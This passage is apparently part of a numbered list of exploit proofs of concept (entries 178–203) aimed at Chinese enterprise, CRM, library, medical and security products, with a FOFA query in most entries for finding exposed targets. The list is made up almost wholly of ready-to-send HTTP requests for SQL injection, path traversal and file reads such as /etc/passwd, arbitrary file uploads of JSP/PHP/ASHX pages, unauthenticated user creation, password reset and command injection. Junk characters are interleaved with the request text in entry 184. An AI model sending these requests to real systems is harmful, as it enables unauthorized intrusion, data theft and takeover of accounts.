/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加/ m  r0 t9 L% Y/ ]- `' U0 _! E; [
FOFA:server="SunFull-Webs"7 g. K$ m9 p) F* S% p: x
POST /soap/AddUser HTTP/1.1
* L: k' m# I" HHost: your-ip
. [& l6 d9 @8 dAccept-Encoding: gzip, deflate
: {9 Y  c& d$ D$ Y& `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 i' d8 |7 r, ~! T
Accept: application/xml, text/xml, */*; q=0.01
/ y5 @+ ]1 B! Y+ \/ H3 iContent-Type: text/xml; charset=utf-8
/ \$ b' R) F. `6 g( [. g- H2 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Z2 d* ]" A  y9 m! ]7 l
X-Requested-With: XMLHttpRequest
8 D7 Z' R/ @6 T* @
2 ?. K3 Q% B$ i2 b4 L$ M
  {3 L& s, n3 `+ u* l2 @% jinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
  @$ d+ C& @" Z( P2 s# N- ]6 q2 J* `; P1 X* g! w- J
- K4 M) P7 `6 \% o8 c$ ^- o; V* k; {  S
185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 (Esafenet) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) 云鉴 Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload interface file upload
Fofa:title="Authenticate Please!"

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload the file and access it to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
